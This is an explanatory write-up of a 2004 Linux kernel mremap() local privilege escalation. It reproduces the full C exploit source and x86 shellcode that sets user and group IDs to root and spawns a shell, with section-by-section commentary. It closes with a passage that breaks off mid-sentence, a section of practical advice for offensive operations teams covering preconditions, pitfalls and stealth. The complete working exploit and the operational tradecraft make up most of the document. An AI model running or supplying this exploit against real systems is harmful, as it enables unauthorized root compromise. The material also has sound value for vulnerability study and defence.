Linux Kernel 2.2.25/2.4.24/2.6.2 'mremap()' Local Privilege Escalation Exploit Explained

Linux Kernel 2.2.25/2.4.24/2.6.2 'mremap()' Local Privilege Escalation Exploit Explained
What this paper is
This paper details a local privilege escalation vulnerability in specific versions of the Linux kernel. The vulnerability lies within the mremap() system call, which is used to resize or move memory mappings. The kernel code behind mremap() calls the internal function do_munmap without checking its return value; by forcing that call to fail, an attacker can leave memory mappings in an inconsistent state and gain elevated privileges, in this exploit by getting its own code to appear inside the memory image of a SUID (Set User ID) binary when that binary is executed.
Simple technical breakdown
The core of the exploit is a logic flaw (a missing error check) within the mremap() system call; it is not a race condition. When mremap() is used to move a memory mapping, it internally calls do_munmap to unmap a region. In vulnerable kernel versions, the caller does not check do_munmap's return value. If do_munmap fails (e.g., because the process has already reached its limit on the number of memory mappings), mremap() continues as if it succeeded.
The exploit leverages this by:
- Setting up a target: It identifies a SUID binary (like /bin/ping) that runs with root privileges when executed.
- Allocating memory: It maps a very large number of single-page regions until mmap() fails, reaching the limit on Virtual Memory Areas (VMAs), and prepares the pages whose page table entries are moved later. This is done to put the kernel's memory management into the state in which do_munmap fails.
- Triggering the vulnerability: It uses mremap() to move a memory region that contains the exploit's own prepared pages (shellcode plus the shell path), not the SUID binary's code. The goal is to cause an internal error during the unmapping phase of mremap().
- Planting code in the SUID image: Due to the unchecked do_munmap return, the mremap() call proceeds even though the unmap failed. According to the exploit's own comments, the moved page table entries populate the kernel's page table cache so that the prepared pages appear inside the memory image of the SUID program (the LINKERPAGES constant suggests the dynamic linker's text pages are the intended location).
- Gaining root: The exploit then executes the SUID binary itself in a cloned child process; that process runs the injected shellcode, which is designed to start a root shell.
Complete code and payload walkthrough
The provided C code implements the exploit. Let's break it down section by section.
/*
*
* mremap missing do_munmap return check kernel exploit
*
* gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
* ./mremap_pte [suid] [[shell]]
*
* Vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 and <= 2.6.2
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/- Purpose: This is the header comment. It states the exploit's purpose (mremap missing do_munmap return check), compilation instructions (
gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte), usage (./mremap_pte [suid] [[shell]]), vulnerable kernel versions, copyright, and a disclaimer.
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <asm/page.h>- Purpose: These are standard C include files providing definitions for input/output, memory allocation, error handling, system calls, signals, time, scheduling, memory mapping, process waiting, system information, and architecture-specific page definitions.
// Two-step stringification: xstr(X) expands X first and then turns the
// result into a string literal, so macro values can be pasted into the
// inline-assembly strings further down.
#define str(s) #s
#define xstr(s) str(s)
// this is for standard kernels with 3/1 split
#define STARTADDR 0x40000000
// PAGE_SIZE * 1024 bytes.
// NOTE(review): presumably the address range covered by one i386 page table
// (1024 entries) -- confirm for the target architecture.
#define PGD_SIZE (PAGE_SIZE * 1024)
// Destination address passed to sys_mremap() in exhaust().
#define VICTIM (STARTADDR + PGD_SIZE)
// First address used by the page-by-page mmap() loop in exhaust().
#define MMAP_BASE (STARTADDR + 3*PGD_SIZE)
// Flag word loaded into %ebx by cloneme().
#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)
// mremap() flag bits, defined locally.
#define MREMAP_MAYMOVE ( (1UL) << 0 )
#define MREMAP_FIXED ( (1UL) << 1 )
// NOTE(review): presumably needed so the _syscall5-generated wrapper named
// sys_mremap resolves to the mremap syscall number -- _syscall5 itself is
// not defined in this file.
#define __NR_sys_mremap __NR_mremap- Purpose: These are preprocessor macros.
- str(s) and xstr(s): Used to stringify preprocessor tokens, which embeds system call numbers and flag values into the inline assembly strings.
- STARTADDR, PGD_SIZE, VICTIM, MMAP_BASE: Define memory addresses and sizes for memory mapping operations. STARTADDR is a base address (0x40000000, chosen for kernels with the standard 3/1 split), PGD_SIZE is PAGE_SIZE * 1024 bytes (4 MiB with 4 KiB pages, i.e. the address range covered by a single page-directory entry rather than the size of the Page Global Directory itself), VICTIM is the destination address of the mremap() call, and MMAP_BASE is the starting address of the mapping loop.
- DSIGNAL, CLONEFL: Define the signal and flags for the clone() system call, used to create new processes. CLONE_VFORK and CLONE_VM are important flags for shared memory and process state.
- MREMAP_MAYMOVE, MREMAP_FIXED: Define flags for the mremap() system call. MREMAP_MAYMOVE allows the kernel to move the mapping, and MREMAP_FIXED requires the mapping to be at a specific address.
- __NR_sys_mremap: Aliases the system call number of mremap so that a wrapper named sys_mremap can be generated.
// how many ld.so pages? this is the .text section length (like cat
// /proc/self/maps) in pages
// Used by exhaust(): the donor mapping is LINKERPAGES+3 pages long and the
// sys_mremap() source length is LINKERPAGES pages (0x14 = 20).
#define LINKERPAGES 0x14- Purpose:
LINKERPAGESis an estimate for the number of pages occupied by the dynamic linker's.textsection. This is used to determine the size of memory regions to manipulate.
// suid victim
// Path loaded by my_execve(); main() replaces it with av[1] when given.
static char *suid="/bin/ping";
// shell to start
// Path copied to the start of every prepared page by pte_populate();
// main() replaces it with av[2] when given.
static char *launch="/bin/bash";- Purpose:
suidandlaunchare global variables storing the default path to a SUID binary (e.g.,/bin/ping) and the desired shell to execute (e.g.,/bin/bash). These can be overridden by command-line arguments.
// Raw five-argument wrapper for the mremap system call.
// NOTE(review): _syscall5 is not defined in this file; presumably it comes
// from the kernel's unistd headers and generates the function body --
// confirm on the build host.
_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
ulong, e);
// Prototype naming the five arguments: addr, old_len, new_len, flags, new_addr.
unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
unsigned long new_len, unsigned long flags,
unsigned long new_addr);- Purpose: This defines a custom wrapper for the
sys_mremapsystem call. The_syscall5macro (likely from a custom header or defined elsewhere) is used to declare a system call with 5 arguments. The subsequent declaration provides the function signature forsys_mremap.
// File-scope state shared by the helpers below:
//   base    - next address for the mmap() loop in exhaust()
//   t       - result of the most recent mmap() call
//   cnt     - number of pages mapped by that loop
//   old_esp - page-aligned stack pointer recorded by get_esp()
//   prot    - protection bits for the next loop mapping
//   victim  - base address of the "PTE donor" mapping; stays 0 in the code shown
static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
// i: loop index, also reused for the mprotect() result; pid: value stored by cloneme().
static int i, pid=0;
// Vectors referenced by my_execve(); main() zeroes both and sets argv[0].
static char *env[2], *argv[2];
// Result of sys_mremap() and of the execve syscall in my_execve().
static ulong ret;- Purpose: These are global variables used throughout the exploit:
base: A memory address used in mapping operations.t: A pointer to unsigned integers, used for memory manipulation.cnt: A counter, likely for tracking memory mapping operations.old_esp: Stores the stack pointer (ESP) at the time of execution.prot: Stores memory protection flags.victim: Stores the target address for memory operations.i: A loop counter.pid: Stores the process ID of a child process created byclone().env,argv: Arrays to hold environment variables and command-line arguments forexecve.ret: Stores the return value of system calls.
// code to appear inside the suid image
// i386 payload whose bytes pte_populate() copies to the end of each prepared
// page; the first bytes of that page hold the `launch` path. Sequence:
// setresuid(0,0,0), setresgid(0,0,0), execve of the path stored at the page
// start, then exit if execve returns.
static void suid_code(void)
{
__asm__(
// `call` pushes the address of the next instruction (jumpme), i.e. an
// address inside the page the payload runs from; callme jumps straight back.
" call callme \n"
// setresuid(0, 0, 0), setresgid(0, 0, 0)
"jumpme: xorl %ebx, %ebx \n"
" xorl %ecx, %ecx \n"
" xorl %edx, %edx \n"
" xorl %eax, %eax \n"
// only %al is written, so the rest of %eax must already be zero
" mov $"xstr(__NR_setresuid)", %al \n"
" int $0x80 \n"
// %eax now holds the previous syscall's result; loading %al alone gives the
// intended number only if that result was 0
" mov $"xstr(__NR_setresgid)", %al \n"
" int $0x80 \n"
// execve(launch)
// pop the address pushed by `call` and round it down to the page start,
// where pte_populate() stored the launch path
" popl %ebx \n"
" andl $0xfffff000, %ebx \n"
" xorl %eax, %eax \n"
// push a zero word; %edx (third syscall argument) points at it
" pushl %eax \n"
" movl %esp, %edx \n"
// push the path pointer; %ecx (second argument) -> { path, 0 }
" pushl %ebx \n"
" movl %esp, %ecx \n"
" mov $"xstr(__NR_execve)", %al \n"
" int $0x80 \n"
// exit
// reached only when execve returned
" xorl %eax, %eax \n"
" mov $"xstr(__NR_exit)", %al \n"
" int $0x80 \n"
"callme: jmp jumpme \n"
);
}- Purpose: This is the shellcode that will be injected into the SUID binary. It's written in x86 assembly.
- call callme: Pushes the address of the next instruction (jumpme) onto the stack and transfers control to callme. The pushed address is used later to locate the page the shellcode is running from.
- jumpme:: This label marks the entry point for the main part of the shellcode.
- xorl %ebx, %ebx, xorl %ecx, %ecx, xorl %edx, %edx, xorl %eax, %eax: These instructions zero out registers.
- mov $"xstr(__NR_setresuid)", %al: Loads the system call number for setresuid into the al register (lower 8 bits of eax).
- int $0x80: Triggers a system call. This call effectively becomes setresuid(0, 0, 0), setting the real, effective, and saved user IDs to 0 (root).
- mov $"xstr(__NR_setresgid)", %al: Loads the system call number for setresgid into al. Only al is written, so this relies on the previous call having returned 0 in eax.
- int $0x80: Triggers setresgid(0, 0, 0), setting all real, effective, and saved group IDs to 0 (root).
- popl %ebx: Pops the address that the initial call pushed (the address of jumpme, which lies inside the shellcode's page) into ebx.
- andl $0xfffff000, %ebx: Rounds that address down to the start of the page. pte_populate copied the launch string (e.g., /bin/bash) to the start of the page, so ebx now points to that string.
- xorl %eax, %eax: Zeros out eax.
- pushl %eax: Pushes a NULL word onto the stack. It serves both as the terminator of the argv array and as an empty environment array.
- movl %esp, %edx: Sets edx (the envp argument) to point to that NULL word, i.e. an empty environment.
- pushl %ebx: Pushes the address of the launch string onto the stack (this will be argv[0]).
- movl %esp, %ecx: Sets ecx to point to the beginning of the argv array on the stack.
- mov $"xstr(__NR_execve)", %al: Loads the system call number for execve into al.
- int $0x80: Triggers execve(launch, argv, envp) with argv = {launch, NULL} and envp = {NULL}. This executes the specified shell (e.g., /bin/bash) as root.
- xorl %eax, %eax, mov $"xstr(__NR_exit)", %al, int $0x80: If execve fails, this sequence calls exit. The status argument is whatever ebx holds, which is still the page-aligned string address rather than an explicitly loaded 0.
- callme: jmp jumpme: This is the target of the initial call. It jumps straight back to jumpme; the call/jmp pair exists only to get the shellcode's own address onto the stack.
// Marker function: pte_populate() subtracts the address of suid_code from the
// address of this function to obtain the payload length, which assumes the
// compiler places it directly after suid_code. The body is otherwise
// irrelevant to that calculation.
static int suid_code_end(int v)
{
return v+1;
}- Purpose: This is a dummy function used to determine the end address of the
suid_codeassembly block. The difference betweensuid_code_endandsuid_codegives the size of the shellcode.
// Stores the current stack pointer, rounded down to a 4 KiB boundary
// (mask 0xfffff000), in the global old_esp.
// NOTE(review): old_esp is written by the asm but declared as an input
// operand, and %eax is not listed as clobbered.
static inline void get_esp(void)
{
__asm__(
" movl %%esp, %%eax \n"
" andl $0xfffff000, %%eax \n"
" movl %%eax, %0 \n"
: : "m"(old_esp)
);
}- Purpose: This inline assembly function retrieves the current stack pointer (
ESP), aligns it to a page boundary, and stores it in theold_espglobal variable. This is crucial for later memory manipulation.
// Issues the clone system call directly through int $0x80 and stores the
// value left in %eax in the global pid; main() treats pid == 0 as the child.
// NOTE(review): pid is written by the asm but declared as an input operand,
// and no clobbers are listed.
static inline void cloneme(void)
{
__asm__(
// save all general-purpose registers; restored by popa below
" pusha \n"
// %ebx = CLONEFL (SIGCHLD | CLONE_VFORK | CLONE_VM)
" movl $("xstr(CLONEFL)"), %%ebx \n"
// %ecx = the current stack pointer
" movl %%esp, %%ecx \n"
" movl $"xstr(__NR_clone)", %%eax \n"
" int $0x80 \n"
" movl %%eax, %0 \n"
" popa \n"
: : "m"(pid)
);
}- Purpose: This inline assembly function calls the
clone() system call.
- pusha: Pushes all general-purpose registers onto the stack.
- movl $("xstr(CLONEFL)"), %%ebx: Loads the CLONEFL flags (SIGCHLD, CLONE_VFORK, CLONE_VM) into ebx. CLONE_VM makes the child share the parent's address space, CLONE_VFORK suspends the parent until the child exits or calls execve, and SIGCHLD is the signal delivered to the parent when the child terminates.
- movl %%esp, %%ecx: Moves the current stack pointer into ecx. This is the stack argument for the child, so the child continues on the same stack as the parent.
- movl $"xstr(__NR_clone)", %%eax: Loads the system call number for clone into eax.
- int $0x80: Executes the clone() system call.
- movl %%eax, %0: The return value of clone() (the child's PID in the parent, 0 in the child, or a negative error code on failure) is stored in the pid global variable.
- popa: Restores the general-purpose registers.
// Loads the memory operands suid, argv and env into %ebx, %ecx and %edx,
// issues the execve system call through int $0x80, and stores the value
// left in %eax in the global ret.
static inline void my_execve(void)
{
__asm__(
// %1 = suid, %2 = argv, %3 = env (operand %0 is the output, ret)
" movl %1, %%ebx \n"
" movl %2, %%ecx \n"
" movl %3, %%edx \n"
" movl $"xstr(__NR_execve)", %%eax \n"
" int $0x80 \n"
: "=a"(ret)
: "m"(suid), "m"(argv), "m"(env)
);
}- Purpose: This inline assembly function executes the
execve()system call with thesuidpath,argv, andenvvariables. It's a direct wrapper forexecve. The output is stored inret.
// Fills the page at addr with the payload layout:
//   offset 0                 : NUL-terminated copy of `launch`
//   middle                   : 0x90 filler bytes
//   last r+1 bytes of page   : r bytes copied from suid_code, then one 0x90
// where r = address of suid_code_end minus address of suid_code.
// The page must be writable when this is called.
static inline void pte_populate(unsigned addr)
{
unsigned r;
char *ptr;
memset((void*)addr, 0x90, PAGE_SIZE); // Fill page with NOPs
r = ((unsigned)suid_code_end) - ((unsigned)suid_code); // Calculate shellcode size
ptr = (void*) (addr + PAGE_SIZE); // Start from the end of the page
ptr -= r+1; // Step back r+1 bytes, so the copy ends one byte before the page end
memcpy(ptr, suid_code, r); // Copy shellcode
memcpy((void*)addr, launch, strlen(launch)+1); // Copy launch string (e.g., /bin/bash) to the beginning of the page
}- Purpose: This function prepares a memory page to hold the shellcode and the
launch string.
- memset((void*)addr, 0x90, PAGE_SIZE);: Fills the entire target page with NOP (No Operation) instructions. This is a common technique to provide a buffer of executable code that does nothing until the actual shellcode is reached.
- r = ((unsigned)suid_code_end) - ((unsigned)suid_code);: Calculates the size of the suid_code assembly block.
- ptr = (void*) (addr + PAGE_SIZE); ptr -= r+1;: Calculates the address r+1 bytes before the end of the page, so that the shellcode ends one byte before the page boundary.
- memcpy(ptr, suid_code, r);: Copies the actual shellcode into the calculated position.
- memcpy((void*)addr, launch, strlen(launch)+1);: Copies the path to the shell (e.g., /bin/bash), including its terminating NUL, to the beginning of the page. The shellcode uses this string both as the program path and as argv[0] in its execve call.
// hit VMA limit & populate PTEs
// Steps, in order:
//   1. map LINKERPAGES+3 writable pages at `victim`, fill pages 2..LINKERPAGES
//      via pte_populate(), then make the whole mapping read-only;
//   2. map single pages from MMAP_BASE upwards until mmap() fails with ENOMEM;
//   3. call sys_mremap() on the prepared region with destination VICTIM;
//   4. unmap [MMAP_BASE, old_esp), map and write one page below the stack
//      area, then unmap [VICTIM-PAGE_SIZE, old_esp).
// Any failure prints "[-] Failed" and terminates the process with _exit(0).
// Requires old_esp to have been set by get_esp() beforehand.
static void exhaust(void)
{
// mmap PTE donor
// note: this uses the global `victim` (0 in the code shown), not the VICTIM macro
t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t)
goto failed;
// prepare shell code pages
// pages 2 .. LINKERPAGES of the donor mapping receive the payload layout
for(i=2; i<LINKERPAGES+1; i++)
pte_populate(victim + PAGE_SIZE*i);
i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
if(i)
goto failed;
// lock unmap
base = MMAP_BASE;
cnt = 0;
prot = PROT_READ;
printf("\n"); fflush(stdout);
for(;;) {
t = mmap((void*)base, PAGE_SIZE, prot,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t) {
if(ENOMEM==errno)
break; // mmap() refused another mapping (ENOMEM): stop mapping
else
goto failed; // Other error
}
// progress output: every 512th mapping and every one past #65520;
// only the printf is conditional, the fflush runs on each iteration
if( !(cnt%512) || cnt>65520 )
printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,
base+PAGE_SIZE); fflush(stdout);
base += PAGE_SIZE;
// consecutive pages alternate between PROT_READ and PROT_READ|PROT_EXEC;
// NOTE(review): presumably so neighbouring mappings are not merged -- confirm
prot ^= PROT_EXEC; // Toggle execute permission
cnt++;
}
// move PTEs & populate page table cache
// arguments: addr = victim+PAGE_SIZE, old_len = LINKERPAGES pages,
// new_len = one page, new_addr = VICTIM
ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,
MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
if(-1==ret)
goto failed;
// return values of both munmap() calls below are ignored
munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,
PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
0);
if(MAP_FAILED==t)
goto failed;
*t = *((unsigned *)old_esp); // Copy the word stored at address old_esp into the new page (this writes to the page)
// arithmetic on a void* here relies on a compiler extension
munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
printf("\n[+] Success\n\n"); fflush(stdout);
return;
failed:
printf("\n[-] Failed\n"); fflush(stdout);
_exit(0);
}- Purpose: This is the core function that orchestrates the exploit by manipulating memory mappings to trigger the vulnerability.
- t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);: This maps LINKERPAGES+3 pages at the address held in the global variable victim (initialised to 0 and not changed anywhere in the code shown; it is distinct from the VICTIM macro). The source comment calls this mapping the "PTE donor". MAP_FIXED means it must be mapped at the specified address.
- for(i=2; i<LINKERPAGES+1; i++) pte_populate(victim + PAGE_SIZE*i);: This loop calls pte_populate for pages 2 through LINKERPAGES of the victim region. This prepares pages that contain the shellcode and the launch string.
- i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);: This changes the protection of the mapped region to read-only before the main exploitation phase.
- The for(;;) loop: This loop repeatedly calls mmap with MAP_FIXED, one page at a time, at increasing addresses starting from MMAP_BASE. It toggles the PROT_EXEC bit of prot on every iteration, so consecutive pages alternate between PROT_READ and PROT_READ|PROT_EXEC; because neighbouring pages differ in protection, each page remains a separate VMA. The loop breaks when mmap returns MAP_FAILED with ENOMEM, which here indicates that the limit on the number of VMAs has been reached (the function's own comment reads "hit VMA limit"), not that physical memory is exhausted.
- ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);: This is the critical mremap() call. It asks the kernel to shrink the LINKERPAGES-page region starting at victim+PAGE_SIZE (which contains the prepared shellcode/data) to PAGE_SIZE and move it to the fixed address VICTIM. The vulnerability is that the internal do_munmap fails during this operation while mremap carries on regardless. The source comment describes the effect as "move PTEs & populate page table cache"; the exploit relies on this to leave the kernel's page table bookkeeping in an inconsistent state.
- munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);: This unmaps the range from MMAP_BASE up to old_esp, releasing the mappings created during the exhaustion phase.
- t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);: This maps a new page at an address derived from the recorded stack pointer (old_esp).
- *t = *((unsigned *)old_esp);: This copies the 32-bit word stored at address old_esp (not the stack pointer value itself) into the newly mapped page, which also writes to that page.
- munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));: Another unmapping operation, covering the range from VICTIM-PAGE_SIZE up to old_esp.
- failed: label: If any mmap, mprotect, or sys_mremap call fails critically, execution jumps here, prints an error, and exits with status 0.
// Parses the running kernel's release string as "a.b.c" and decides two
// flags: v (vulnerable) and e (exploitable by this program). Prints both.
// Returns only when v and e are both set; otherwise, or when the release
// string does not parse as 2.x.y, the process terminates with _exit(0).
static inline void check_kver(void)
{
static struct utsname un;
int a=0, b=0, c=0, v=0, e=0, n;
uname(&un); // Get kernel version information (return value is not checked)
n=sscanf(un.release, "%d.%d.%d", &a, &b, &c); // Parse version string (e.g., "2.4.20")
if(n!=3 || a!=2) { // Check if parsing was successful and major version is 2
printf("\n[-] invalid kernel version string\n");
_exit(0);
}
// Logic to determine if the kernel version is vulnerable and exploitable
if(b==2) { // Kernel 2.2.x
if(c<=25)
v=1; // Vulnerable; e stays 0, so the program exits below
}
else if(b==3) { // Kernel 2.3.x (its own branch, separate from the 2.4.x check below)
if(c<=99) // 2.3.0 to 2.3.99
v=1; // Vulnerable; e stays 0, so the program exits below
}
else if(b==4) { // Kernel 2.4.x
if(c>18 && c<=24) // Specific range for 2.4.19 to 2.4.24
v=1, e=1; // Vulnerable and exploitable
else if(c>24) // 2.4.25+
v=0, e=0; // Not vulnerable
else // 2.4.0 to 2.4.18
v=1, e=0; // Marked vulnerable but not exploitable by this program
}
else if(b==5 && c<=75) // Kernel 2.5.x up to 2.5.75 (separate from the 2.6.x check below)
v=1, e=1; // Vulnerable and exploitable
else if(b==6 && c<=2) // Kernel 2.6.x
v=1, e=1; // Vulnerable and exploitable
printf("\n[+] kernel %s vulnerable: %s exploitable %s",
un.release, v? "YES" : "NO", e? "YES" : "NO" );
fflush(stdout);
if(v && e) // If vulnerable and exploitable, continue
return;
_exit(0); // Otherwise, exit
}- Purpose: This function checks the running kernel version to ensure it's within the vulnerable range.
- uname(&un);: Fills a utsname structure with system information, including the kernel release string.
- sscanf(un.release, "%d.%d.%d", &a, &b, &c);: Parses the kernel release string (e.g., "2.4.20") into integer components a (major), b (minor), and c (patch level).
- The if conditions then check these components against the known vulnerable versions. The file header lists <= 2.2.25, <= 2.4.24 and <= 2.6.2; the code additionally treats 2.3.x and 2.5.x (up to 2.5.75) as vulnerable.
- It sets v to 1 if the kernel is vulnerable and e to 1 if it's considered "exploitable" (meaning the specific technique used in this exploit is likely to work). Only 2.4.19 to 2.4.24, 2.5.0 to 2.5.75 and 2.6.0 to 2.6.2 set e to 1.
- If the kernel is not both vulnerable and exploitable according to its checks, the program exits.
// Entry point. Usage per the file header: ./mremap_pte [suid] [[shell]].
// Order matters: `launch` must be final and old_esp must be recorded before
// exhaust() runs, because exhaust() copies `launch` into the prepared pages
// and uses old_esp for its address calculations.
// Always returns 0 when it returns at all.
int main(int ac, char **av)
{
// prepare
check_kver(); // Check kernel version first (exits the process if the check fails)
memset(env, 0, sizeof(env));
memset(argv, 0, sizeof(argv));
if(ac>1) suid=av[1]; // Override default SUID binary if provided
if(ac>2) launch=av[2]; // Override default shell if provided
argv[0] = suid; // Set argv[0] for the execve call
get_esp(); // Record the page-aligned stack pointer in old_esp
// mmap & clone & execve
exhaust(); // Perform memory mapping and exhaustion to set up exploit conditions
cloneme(); // Clone the process; the result is stored in pid
if(!pid) { // If this is the child process (pid is 0)
my_execve(); // Execute the SUID binary
} else { // Any non-zero pid: the parent, or a negative error value if clone failed
waitpid(pid, 0, 0); // Wait for the child process to finish
}
return 0;
}- Purpose: This is the main function that orchestrates the exploit execution.
check_kver();: Calls the kernel version check function.memset(env, 0, sizeof(env)); memset(argv, 0, sizeof(argv));: Initializes theenvandargvarrays to null.if(ac>1) suid=av[1]; if(ac>2) launch=av[2];: Allows the user to specify a different SUID binary and shell via command-line arguments.argv[0] = suid;: Sets the first argument for theexecvecall to the path of the SUID binary.get_esp();: Captures the initial stack pointer.exhaust();: Calls the function to perform the memory mapping and exhaustion, setting up the kernel state for the exploit.cloneme();: Creates a child process usingclone(). This is done so that the parent can wait for the child to execute the SUID binary, while the child performs the actual execution.if(!pid) { my_execve(); } else { waitpid(pid, 0, 0); }: This is the standard fork/exec pattern. Ifpidis 0, it means this is the child process, and it callsmy_execve()to execute the SUID binary. Ifpidis greater than 0, it means this is the parent process, and it waits for the child to complete usingwaitpid().
Code Fragment/Block -> Practical Purpose Mapping:
#include <stdio.h>, #include <stdlib.h>, etc.-> Standard Library Includes: Provides necessary functions for I/O, memory management, system calls, etc.#define STARTADDR, #define PGD_SIZE, etc.-> Memory Address Definitions: Defines key memory regions and sizes used for mapping and manipulation.#define MREMAP_MAYMOVE, #define MREMAP_FIXED-> mremap Flags: Specifies how themremapsystem call should behave.static char *suid="/bin/ping"; static char *launch="/bin/bash";-> Default Targets: Sets default paths for the SUID binary and the shell to launch._syscall5(ulong, sys_mremap, ...)-> System Call Declaration: Declares thesys_mremapsystem call for use.static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;-> Global Variables: Holds state information for the exploit, such as memory addresses, counters, and stack pointers.static void suid_code(void)-> Shellcode Definition: Contains the x86 assembly code that will be injected and executed to gain root privileges.static int suid_code_end(int v)-> Shellcode End Marker: Used to calculate the size of thesuid_codeassembly.static inline void get_esp(void)-> Stack Pointer Capture: Retrieves and stores the current stack pointer, aligned to a page.static inline void cloneme(void)-> Process Cloning: Uses theclone()system call to create a child process.static inline void my_execve(void)-> Execve Wrapper: A helper function to execute theexecve()system call.static inline void pte_populate(unsigned addr)-> Page Preparation: Fills a memory page with NOPs, copies shellcode, and the launch string.static void exhaust(void)-> Memory Exhaustion & Vulnerability Trigger: Maps numerous pages to exhaust VMAs, then usesmremapto trigger the kernel vulnerability.static inline void check_kver(void)-> Kernel Version Check: Verifies if the running kernel is within the vulnerable version range.int main(int ac, char **av)-> Main Execution Flow: Orchestrates the entire exploit, from version checking to memory manipulation and process execution.
Shellcode/Payload Segments:
The primary payload is the suid_code assembly function. It's executed after being injected into a SUID binary.
Stage 1: Privilege Escalation (setresuid/setresgid)
- Code:
jumpme: xorl %ebx, %ebx xorl %ecx, %ecx xorl %edx, %edx xorl %eax, %eax mov $"xstr(__NR_setresuid)", %al int $0x80 mov $"xstr(__NR_setresgid)", %al int $0x80 - Purpose: This segment calls
setresuid(0, 0, 0)andsetresgid(0, 0, 0). This effectively changes the real, effective, and saved user and group IDs of the current process to root (0). This is the primary privilege escalation step.
- Code:
Stage 2: Execution of Target Shell (execve)
- Code:
popl %ebx // Pop the address pushed by the initial call (it points into the shellcode's page)
andl $0xfffff000, %ebx // Round down to the page start, where the launch string (e.g., /bin/bash) is stored
xorl %eax, %eax // Zero eax
pushl %eax // Push a NULL word (argv terminator and empty envp)
movl %esp, %edx // edx (envp) points to the NULL word
pushl %ebx // Push launch string address as argv[0]
movl %esp, %ecx // ecx points to start of argv
mov $"xstr(__NR_execve)", %al // syscall number for execve
int $0x80 // Execute the shell
- Purpose: This segment prepares the arguments for the execve() system call and then invokes it. It recovers the address of the launch string (e.g., /bin/bash) by popping the return address that call callme pushed and rounding it down to the start of the page, sets up the argv array on the stack (with the launch string as argv[0] and a null terminator), and then calls execve. This replaces the current process with the specified shell, now running with root privileges.
- Code:
Stage 3: Exit (if execve fails)
- Code:
xorl %eax, %eax // Zero eax mov $"xstr(__NR_exit)", %al // syscall number for exit int $0x80 // Exit the process - Purpose: If the
execve()call fails for any reason, this segment ensures the process exits cleanly with a status of 0.
- Code:
Stage 4: Jump Target
- Code:
callme: jmp jumpme
- Purpose: This is a small jump instruction used to set up the initial execution flow. The suid_code function begins with call callme, which pushes the address of the instruction following the call (that is, the address of jumpme) onto the stack and then transfers control to callme. callme then jumps back to jumpme, which is the actual start of the shellcode. When popl %ebx is executed in Stage 2, it pops that saved address, which lies inside the shellcode's own page; masking it with 0xfffff000 yields the start of the page, where pte_populate stored the launch string.
- Code:
Practical details for offensive operations teams
- Required Access Level: Local user access. The exploit runs as a standard user and aims to escalate privileges to root.
- Lab Preconditions:
- A Linux system running one of the vulnerable kernel versions (e.g., 2.2.25, 2.4.24, 2.6.2).
- The target system must have a SUID binary (like
/bin/pingor/usr/bin/su) that is not heavily protected or monitored. - The user must have write permissions in a directory where the exploit binary can be saved and executed.
- Sufficient memory available for the
mmapoperations.
- Tooling Assumptions:
- A C compiler (like GCC) is available on the target or can be used to cross-compile the exploit.
- Standard Linux utilities (
/bin/ping,/bin/bash, etc.) are present. - The exploit binary itself (
mremap_pte).
- Execution Pitfalls:
- Kernel Version Mismatch: The exploit will exit if the kernel version is not within the specified vulnerable range.
- Memory Availability: If the system is severely memory-constrained, the
mmapoperations might fail, preventing the exploit from proceeding. - SUID Binary Integrity: If the target SUID binary has been modified or is not present, the exploit might fail or execute unintended code.
- Timing and interference: The flaw itself is a missing return-value check in mremap rather than a race condition, but other system activities could potentially interfere with the memory state the exploit sets up, though it's less likely to cause a complete failure than a simple crash.
- Address Space Layout Randomization (ASLR): While ASLR wasn't as prevalent or as strong in the era of these kernels, it could theoretically complicate memory address prediction if enabled. The exploit relies on a predictable user address-space layout (fixed addresses such as 0x40000000 and the position of the stack) for its operations.
- SELinux/AppArmor: If these security modules are in place and configured to restrict memory mapping or SUID execution, they could prevent the exploit from succeeding.
- Kernel Hardening: Modern kernels have many protections against this type of memory corruption and privilege escalation.
- Tradecraft Considerations:
- Stealth: Running this exploit can be noisy due to extensive
